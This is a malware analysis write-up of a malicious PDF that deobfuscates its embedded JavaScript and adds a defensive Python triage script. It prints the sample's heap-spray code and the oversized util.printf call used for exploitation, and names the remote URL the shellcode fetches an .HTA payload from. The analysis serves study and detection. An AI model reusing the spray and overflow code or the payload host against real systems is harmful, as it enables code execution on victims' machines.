This is the analysis that I have done on the malicious PDF file.
Target: doc1.pdf.1
MD5: 0f6af57c8ba2b3cdd9593223ca38e2de
SHA1: 93044e9484357e0de6c4dd618ded8beb2e43f878
One of the common techniques for compressing PDF streams is zlib. Not surprisingly, this sample was deflated using zlib as well:
We can easily inflate these contents using Ghostscript with the pdfinflt.ps file that comes with it, using the command below:
>gs -- "C:\Program Files\gs\toolbin\pdfinflt.ps" doc1.pdf.1 out.pdf.1
GPL Ghostscript 8.50 (2005-12-31)
Copyright (C) 2005 artofcode LLC, Benicia, CA. All rights reserved.
This software comes with NO WARRANTY: see the file PUBLIC for details.
Converting doc1.pdf.1 to out.pdf.1
Done.
Similar output indicates that the file has been inflated successfully. The inflated PDF contents:
The first screenshot shows the deobfuscated shellcode and the second one shows the obfuscated JavaScript. From the screenshot below it is obvious that the deobfuscation can be done using the JavaScript "unescape" method:
Using the unescape function, we can easily convert the obfuscated code to readable JavaScript code:
var sccs = unescape(this.getField('text').value);
This JavaScript code uses the heap spray technique for exploitation. The exploit uses a slightly different method from the PoC: the PoC author uses a loop to concatenate digits into a large number that overflows util.printf(), whereas this sample uses a predefined large number.
// Build the slide block and pad it up to about 0x60000 bytes
var bgbl = unescape("%u0A0A" + "%u0A0A");
var slspc = 20 + sccs.length;
while (bgbl.length < slspc) bgbl += bgbl;
var fblk = bgbl.substring(0, slspc);
var blk = bgbl.substring(0, bgbl.length - slspc);
while (blk.length + slspc < 0x60000)
    blk = blk + blk + fblk;
// Heap spray: 1200 copies of slide + shellcode
var mmy = new Array();
for (i = 0; i < 1200; i++) { mmy[i] = blk + sccs }
// Predefined oversized number handed to util.printf()
var nm = 12;
for (i = 0; i < 18; i++) { nm = nm + "9"; }
for (i = 0; i < 276; i++) { nm = nm + "8"; }
util.printf(unescape("" + "%" + "25%34%" + "35%30%30%30%66"), nm);
this.closeDoc(true);
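As an added example (not code from the original post), a small Python triage script that covers the two steps above without Ghostscript or a PDF reader: it inflates the zlib-compressed streams, flags the indicators seen in this sample (the JavaScript action, unescape(), util.printf() and the %u0A0A spray slide), and decodes the literal-built unescape() arguments, which turns the obfuscated util.printf() argument into its real format string. The PDF bytes are constructed inline; the analysed file itself is not reproduced.

```python
import re
import zlib
# Constructed sample, not the analysed file: a minimal PDF whose FlateDecode
# stream holds JavaScript modelled on the lines shown above.
JS_BODY = (
    b'var bgbl = unescape("%u0A0A"+"%u0A0A");\n'
    b'util.printf(unescape(""+"%"+"25%34%"+"35%30%30%30%66"), nm);\n'
)
SAMPLE_PDF = (
    b"%PDF-1.4\n1 0 obj\n<< /Type /Action /S /JavaScript /JS 2 0 R >>\nendobj\n"
    b"2 0 obj\n<< /Filter /FlateDecode >>\nstream\n" + zlib.compress(JS_BODY)
    + b"\nendstream\nendobj\ntrailer\n<< /Root 1 0 R >>\n%%EOF\n"
)
STREAM_RE = re.compile(rb"stream\r?\n(.*?)endstream", re.DOTALL)
ESCAPE_RE = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")
LITERALS_RE = re.compile(r"""unescape\(\s*((?:["'][^"']*["']\s*\+?\s*)+)\)""")
# Indicators from the sample: JS action, unescape() decoding, util.printf()
# and the %u0A0A slide that pads the heap spray (matched case-insensitively).
INDICATORS = {"javascript_action": rb"/JavaScript|/JS\b",
              "unescape_decoder": rb"unescape\s*\(",
              "util_printf_call": rb"util\.printf\s*\(",
              "heap_spray_slide": rb"%u0a0a"}
def inflate_streams(pdf: bytes) -> list:
    # Every stream body, zlib-inflated when Flate-encoded; decompressobj tolerates
    # the bytes that sit between the zlib end marker and 'endstream'.
    out = []
    for m in STREAM_RE.finditer(pdf):
        try:
            out.append(zlib.decompressobj().decompress(m.group(1)))
        except zlib.error:
            out.append(m.group(1))  # not Flate-encoded (or damaged): keep raw
    return out
def js_unescape(s: str) -> str:
    # Mimic JavaScript unescape() for %XX and %uXXXX sequences.
    return ESCAPE_RE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)
def decode_unescape_literals(js: str) -> list:
    # Decode every unescape("..."+"...") call built only from string literals.
    decoded = []
    for group in LITERALS_RE.findall(js):
        pieces = re.findall(r"""["']([^"']*)["']""", group)
        decoded.append(js_unescape("".join(pieces)))
    return decoded
def scan(pdf: bytes) -> dict:
    # Indicators over the raw file plus inflated streams, and decoded literals.
    streams = inflate_streams(pdf)
    hits = sorted(n for n, p in INDICATORS.items()
                  if any(re.search(p, t, re.IGNORECASE) for t in [pdf, *streams]))
    decoded = [lit for s in streams
               for lit in decode_unescape_literals(s.decode("latin-1"))]
    return {"indicators": hits, "decoded": decoded}
```

Running scan() on the constructed file decodes the printf argument to "%45000f", the format string the obfuscation was hiding.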
Shellcode2exe is used to convert the Unicode-escaped shellcode into bytecode:
By using some debugging techniques, we can find the payload: this exploit tries to download an arbitrary .HTA file from the remote server http://adxdnet.net/code/srun.php